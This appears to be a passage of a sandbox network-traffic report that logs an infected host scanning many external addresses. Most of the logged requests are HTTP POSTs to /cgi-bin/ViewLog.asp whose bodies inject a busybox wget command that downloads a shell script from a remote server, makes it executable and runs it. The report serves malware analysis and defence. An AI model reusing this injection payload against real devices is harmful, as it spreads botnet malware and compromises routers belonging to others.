                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:45Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      825192.168.2.155824045.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:45.857462883 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:45Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      826192.168.2.154683694.30.80.818080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:45.961819887 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      827192.168.2.155490094.123.120.128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.020968914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      828192.168.2.154797262.29.40.2138080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.021020889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      829192.168.2.155479294.187.97.1388080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.021078110 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      830192.168.2.154986831.136.43.1158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.163739920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:46.775887966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:48.023823977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:50.519767046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:55.639813900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.623457909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:26.358881950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:07.317662954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      831192.168.2.155614695.47.122.2108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.261374950 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      832192.168.2.155747695.131.78.908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.263752937 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:46.503843069 CET83INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      Transfer-Encoding: chunked


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      833192.168.2.155713094.122.218.488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.272794962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      834192.168.2.154970094.121.20.2178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.273020983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      835192.168.2.155904695.46.4.418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.278323889 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      836192.168.2.154117085.140.63.228080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.294338942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      837192.168.2.155825645.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.345921993 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:46Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      838192.168.2.154684694.30.80.818080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.385870934 CET380INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:30:46 GMT
                                                      Connection: close
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Cache-Control: post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      839192.168.2.154675694.250.30.1988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.405071020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      840192.168.2.153798431.136.129.1298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.465554953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:47.095850945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:48.343816042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:51.031848907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:56.151611090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:06.135315895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:26.358906031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:07.317697048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      841192.168.2.155023094.120.153.1438080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.508775949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
